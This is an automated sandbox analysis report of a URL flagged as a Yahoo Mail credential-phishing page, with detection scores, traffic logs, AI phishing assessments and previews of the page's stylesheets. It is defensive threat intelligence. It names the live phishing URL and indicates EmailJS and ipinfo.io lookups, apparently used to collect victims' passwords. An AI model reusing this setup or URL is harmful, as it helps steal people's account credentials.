Windows Analysis Report
http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl

Overview

General Information

Sample URL: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
Analysis ID: 1467885

Detection

HTMLPhisher
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish64
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 1892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2016,i,760030498250869216,11143219381644743243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0.0.pages.csv | JoeSecurity_HtmlPhish_64 | Yara detected HtmlPhish_64 | Joe Security |
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl Avira URL Cloud: detection malicious, Label: phishing
Source: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.css Avira URL Cloud: Label: phishing
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/images/download_afD_icon.ico Avira URL Cloud: Label: phishing
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.css Avira URL Cloud: Label: phishing

Phishing

Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev LLM: Score: 9 brands: Yahoo Reasons: The URL 'https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev' does not match the legitimate domain 'yahoo.com'. The page prominently displays a login form asking for a password, which is a common phishing tactic. The domain 'r2.dev' is suspicious and not associated with Yahoo. The use of a subdomain and a long, complex URL is another common social engineering technique to mislead users. There is no CAPTCHA present, which is often used by legitimate sites to prevent automated attacks. Overall, the combination of these factors strongly suggests that this is a phishing site. DOM: 0.0.pages.csv
Source: Yara match File source: 0.0.pages.csv, type: HTML
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl HTTP Parser: Number of links: 0
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl HTTP Parser: Title: Yahoo Mail | Sign in does not match URL
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl HTTP Parser: <input type="password" .../> found
Source: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 87.248.205.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1 Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /gform.css HTTP/1.1 Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,*/*;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /gstyles.css HTTP/1.1 Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,*/*;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1 Host: logodownload.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/download_afD_icon.ico HTTP/1.1 Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /json?token=5eaf0700b2c0d2 HTTP/1.1 Host: ipinfo.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, */*; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2019/09/yahoo-logo-1.png HTTP/1.1 Host: logodownload.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /json?token=5eaf0700b2c0d2 HTTP/1.1 Host: ipinfo.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /gsecondcheck.html?usr=ouwxfmmtalwl HTTP/1.1 Host: pub-431046b43b84431ea1b4a212cd34e302.r2.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: pub-431046b43b84431ea1b4a212cd34e302.r2.dev
Source: global traffic DNS traffic detected: DNS query: pro.fontawesome.com
Source: global traffic DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: logodownload.org
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 04 Jul 2024 22:30:28 GMT Content-Type: text/html Content-Length: 27150 Connection: close Server: cloudflare CF-RAY: 89e28f5d68df423a-EWR
Source: chromecache_56.2.dr String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Source: chromecache_57.2.dr String found in binary or memory: https://api.emailjs.com
Source: chromecache_56.2.dr String found in binary or memory: https://cdn.jsdelivr.net/npm/
Source: chromecache_57.2.dr String found in binary or memory: https://dashboard.emailjs.com/admin
Source: chromecache_57.2.dr String found in binary or memory: https://dashboard.emailjs.com/admin/account
Source: chromecache_57.2.dr String found in binary or memory: https://dashboard.emailjs.com/admin/templates
Source: chromecache_56.2.dr String found in binary or memory: https://dashboard.emailjs.com/templates
Source: chromecache_55.2.dr String found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
Source: chromecache_52.2.dr String found in binary or memory: https://fontawesome.com
Source: chromecache_52.2.dr String found in binary or memory: https://fontawesome.com/license
Source: chromecache_56.2.dr String found in binary or memory: https://ipinfo.io
Source: chromecache_56.2.dr String found in binary or memory: https://ipinfo.io/json?token=5eaf0700b2c0d2
Source: chromecache_56.2.dr String found in binary or memory: https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png
Source: chromecache_56.2.dr String found in binary or memory: https://mail.yahoo.com
Source: chromecache_56.2.dr String found in binary or memory: https://pro.fontawesome.com/releases/v5.10.0/css/all.css
Source: chromecache_55.2.dr String found in binary or memory: https://www.cloudflare.com/favicon.ico
Source: classification engine Classification label: mal72.phis.win@17/22@18/8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2016,i,760030498250869216,11143219381644743243,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction
Source | Detection | Scanner | Label | Link
http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl | 100% | Avira URL Cloud | phishing |
http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl | 100% | SlashNext | Credential Stealing type: Phishing & Social Engineering |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://fontawesome.com | 0% | URL Reputation | safe |
https://fontawesome.com/license | 0% | URL Reputation | safe |
https://api.emailjs.com | 0% | Avira URL Cloud | safe |
https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.css | 100% | Avira URL Cloud | phishing |
https://cdn.jsdelivr.net/npm/ | 0% | Avira URL Cloud | safe |
https://dashboard.emailjs.com/admin | 0% | Avira URL Cloud | safe |
https://pro.fontawesome.com/releases/v5.10.0/css/all.css | 0% | Avira URL Cloud | safe |
https://dashboard.emailjs.com/admin/account | 0% | Avira URL Cloud | safe |
https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png | 0% | Avira URL Cloud | safe |
https://mail.yahoo.com | 0% | Avira URL Cloud | safe |
https://dashboard.emailjs.com/templates | 0% | Avira URL Cloud | safe |
https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/images/download_afD_icon.ico | 100% | Avira URL Cloud | phishing |
https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.css | 100% | Avira URL Cloud | phishing |
https://www.cloudflare.com/favicon.ico | 0% | Avira URL Cloud | safe |
https://dashboard.emailjs.com/admin/templates | 0% | Avira URL Cloud | safe |
https://ipinfo.io/json?token=5eaf0700b2c0d2 | 0% | Avira URL Cloud | safe |
https://developers.cloudflare.com/r2/data-access/public-buckets/ | 0% | Avira URL Cloud | safe |
https://ipinfo.io | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipinfo.io | 34.117.186.192 | true | false | | unknown
www.google.com | 142.250.185.68 | true | false | | unknown
logodownload.org | 104.26.7.17 | true | false | | unknown
pub-431046b43b84431ea1b4a212cd34e302.r2.dev | 104.18.2.35 | true | true | | unknown
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
cdn.jsdelivr.net | unknown | unknown | false | | unknown
pro.fontawesome.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl | true | | unknown
https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.css | true | Avira URL Cloud: phishing | unknown
http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl | true | | unknown
https://logodownload.org/wp-content/uploads/2019/09/yahoo-logo-1.png | false | Avira URL Cloud: safe | unknown
https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/images/download_afD_icon.ico | true | Avira URL Cloud: phishing | unknown
https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.css | true | Avira URL Cloud: phishing | unknown
https://ipinfo.io/json?token=5eaf0700b2c0d2 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://fontawesome.com | chromecache_52.2.dr | false | URL Reputation: safe | unknown
https://cdn.jsdelivr.net/npm/ | chromecache_56.2.dr | false | Avira URL Cloud: safe | unknown
https://dashboard.emailjs.com/admin/account | chromecache_57.2.dr | false | Avira URL Cloud: safe | unknown
https://api.emailjs.com | chromecache_57.2.dr | false | Avira URL Cloud: safe | unknown
https://pro.fontawesome.com/releases/v5.10.0/css/all.css | chromecache_56.2.dr | false | Avira URL Cloud: safe | unknown
https://dashboard.emailjs.com/templates | chromecache_56.2.dr | false | Avira URL Cloud: safe | unknown
https://fontawesome.com/license | chromecache_52.2.dr | false | URL Reputation: safe | unknown
https://mail.yahoo.com | chromecache_56.2.dr | false | Avira URL Cloud: safe | unknown
https://dashboard.emailjs.com/admin | chromecache_57.2.dr | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/favicon.ico | chromecache_55.2.dr | false | Avira URL Cloud: safe | unknown
https://dashboard.emailjs.com/admin/templates | chromecache_57.2.dr | false | Avira URL Cloud: safe | unknown
https://developers.cloudflare.com/r2/data-access/public-buckets/ | chromecache_55.2.dr | false | Avira URL Cloud: safe | unknown
https://ipinfo.io | chromecache_56.2.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
34.117.186.192 | ipinfo.io | United States | | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
142.250.185.68 | www.google.com | United States | | 15169 | GOOGLEUS | false
104.18.2.35 | pub-431046b43b84431ea1b4a212cd34e302.r2.dev | United States | | 13335 | CLOUDFLARENETUS | true
104.26.7.17 | logodownload.org | United States | | 13335 | CLOUDFLARENETUS | false
104.26.6.17 | unknown | United States | | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | | unknown | unknown | false
IP
192.168.2.4
192.168.2.5
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467885
Start date and time: 2024-07-05 00:29:27 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: browseurl.jbs
Sample URL: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.phis.win@17/22@18/8
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.78, 142.250.110.84, 142.250.185.67, 172.64.147.188, 104.18.40.68, 142.250.185.138, 104.18.187.31, 104.18.186.31, 142.250.186.74, 142.250.181.234, 142.250.185.202, 142.250.185.74, 216.58.206.74, 142.250.185.234, 172.217.18.106, 142.250.184.234, 172.217.23.106, 142.250.185.170, 216.58.206.42, 142.250.186.42, 216.58.212.138, 142.250.185.106, 142.250.186.170, 40.68.123.157, 93.184.221.240, 20.242.39.171, 192.229.221.95, 13.85.23.206, 216.58.206.67
• Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, pro.fontawesome.com.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
No simulations
Input | Output
URL: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl Model: Perplexity: mixtral-8x7b-instruct
{"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests for a sensitive information i.e. password.","The text does not create a sense of urgency.","There is no CAPTCHA or any anti-robot detection mechanism present on the webpage."]}
Title: Yahoo Mail | Sign in OCR: yahoo! yahoo! Yahoo makes it easy to enjoy what matters most in Enter password your world. using your Yahoo account Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of Password life. Next Forgot password?
                      URL: https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev Model: gpt-4o
                      {  "phishing_score": 9,  "brands": "Yahoo",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "yahoo.com",  "reasons": "The URL 'https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev' does not match the legitimate domain 'yahoo.com'. The page prominently displays a login form asking for a password, which is a common phishing tactic. The domain 'r2.dev' is suspicious and not associated with Yahoo. The use of a subdomain and a long, complex URL is another common social engineering technique to mislead users. There is no CAPTCHA present, which is often used by legitimate sites to prevent automated attacks. Overall, the combination of these factors strongly suggests that this is a phishing site."}
                      No context
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):1218
                      Entropy (8bit):5.026509521547098
                      Encrypted:false
                      SSDEEP:24:VUAotOyJFPz0tv4IrexQCyJIQwXXxsqO1e5q811A3hLB6XOIL7/:iAQJ5z0tAce8IQQBskFINA
                      MD5:726EF0647391ED5EFC9076BCDB91C606
                      SHA1:5BDEE0E3E5C9B14CE2F6D9CB34A1EB056B0B51EE
                      SHA-256:0F549EC9F7ABAAF6409BF193A6156746C92DF5FF979C66A378F2E73E616C8533
                      SHA-512:91A23DEE6751E1043FAD976F74EC1CCFE71E643B3F8B53C51439CCE42F701731EBDE99D0BBF3E938E9A2CF8E44D19ADB8A396BBDAA0845E639228C41D761B5A3
                      Malicious:false
                      Reputation:low
                      URL:https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gform.css
                      Preview:input {.. -webkit-appearance: none;.. -moz-appearance: none;.. appearance: none;.. border-radius: 0;.. }.....input-field {.. position: relative;...text-align: left;...margin-top: 9ex;.. }.....input-field label {.. position: absolute;.. top: 0;.. left: 0;.. width: 100%;.. color: #717171;.. transition: 0.2s all;.. cursor: text;.. }......input[type="text"], input[type="password"]{...border: none;...border-bottom: 1px solid gray;...width: 100%;...padding-top: .4em;...padding-bottom: .4em;...font-size: 105%;.....}....input[type="text"]:hover, input[type="password"]:hover{../*..*/....}.....input-field input:focus, .input-field input:valid {.. border-color: rgb(11,110,253);.. border-bottom: 1px solid rgb(11,110,253);.. }.....input-field input:focus~label, .input-field input:valid~label {.. top: -25px;.. color: black;...font-size: 80%;.. }.........input[type=submit], button{.. width: 100%;.. margin-top: 2ex;.. padding: 2ex;.. border-radi
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:downloaded
                      Size (bytes):1444
                      Entropy (8bit):4.59048261752926
                      Encrypted:false
                      SSDEEP:24:AB1CrJzswvtlyWkV9FY51CyoP/WB1s6KTdW1APvbTJt8CPF:AB1CrJgw14fU05/YmbTECPjTX8g
                      MD5:52ECF9BBF69E5BB6EA38C281C8DE64DF
                      SHA1:24408727238F2D74888BC2B4DCDB4409BA7B508B
                      SHA-256:B76CCCD789FBC73288F948C24B4E2C311B8AA7FEDFB026E20B76509F99193F4B
                      SHA-512:29A46EB12B7CE9D95C9E92D8407E2CC1AF177927C77A26511B01AACDEADFAD276BD9B442761CFFA41125733E4EECDDCFCC227C6AE272CC2E2F0B6752D88E6221
                      Malicious:false
                      Reputation:low
                      URL:https://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gstyles.css
                      Preview:* { .. -moz-box-sizing: border-box; .. -webkit-box-sizing: border-box; .. box-sizing: border-box; ..}....html , body{.. font-family: "Trebuchet MS", "Helvetica Neue", Helvetica, Arial, sans-serif;.. height: 100%;.. width: 100%;..}....body{.. margin: 0;.. padding: 0;.. background-color: #F4F4F4;..}..#header{.. padding: 2ex;.. width: 100%;.. height: auto;.. background-color: white;..}..#header img{.. height: 4ex;.. margin-left: 2ex;.. ..}..#main{.. width: 1000px;.. margin: 0 auto;.. position: static;.. ..}..#log{.. width: 400px;.. height: auto;.. margin-top: 2ex;.. padding: 3.5ex;.. background-color: white;.. text-align: center;.. float: right;....}..#log img{.. height: 3ex;.. ..}..#minfo{.. width:550px;.. height: 50px;.. display: inline-flex;.. padding-top: 7ex;....}....#minfo p{.. font-size: 140%;.... ..}....#checkk{.. margin-top:2.5ex;..}....#btnn{.. margin-top: 10ex;..}....@
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:PNG image data, 2160 x 599, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):57304
                      Entropy (8bit):7.8007384651994025
                      Encrypted:false
                      SSDEEP:1536:3hYSWoE7G/PWZHM2Gcn4iHFNcEFIZ57Inyeaa4M:RYhoE6/vRH2ny7M
                      MD5:8F78102F8FE4467EA5AF76657DD90891
                      SHA1:2CCA9300ABC18E5D22172A146EEBB32B44764489
                      SHA-256:DD5A09D5898D5480D063E1833C4D9BC3F509F3D7C672E0C0E973BB061A694AE2
                      SHA-512:82F21501C5209C4840288C9C5268C4A860F118B9D797019E2328E9D8C5A57B4FA780E7802EFBF12C28EF80F0DB3145EBF57A17190A3BE191AAF488BAC5C9B89B
                      Malicious:false
                      Reputation:low
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:ASCII text, with very long lines (65393)
                      Category:downloaded
                      Size (bytes):156228
                      Entropy (8bit):4.7111706245877825
                      Encrypted:false
                      SSDEEP:1536:KgvcfQ4aNi7HHQZD0bMSPCDTdV3dWGFIiboA+8Ieiy6BauXZG817fgFSkAmYdAT/:DcI4aY7QN0bjPerGuHuXkz
                      MD5:AA1272633E7E552395D147A499BAD186
                      SHA1:DDBCCB0011DD4868A013B1DCBDB836B7213EB41D
                      SHA-256:2AF905D92CFD34B5413126A54F639DA408166CBBCB54318E413AD5E10B5BF6EC
                      SHA-512:886DDFC7252269B42B0ADFD5F4E47DA0CD6CCB9B0B3EA18C015B1E4EDB1EB1F55CF49728FDCDD151949256851C72CC555CD7F6408A5638595F26D0CAF86FFBDC
                      Malicious:false
                      Reputation:low
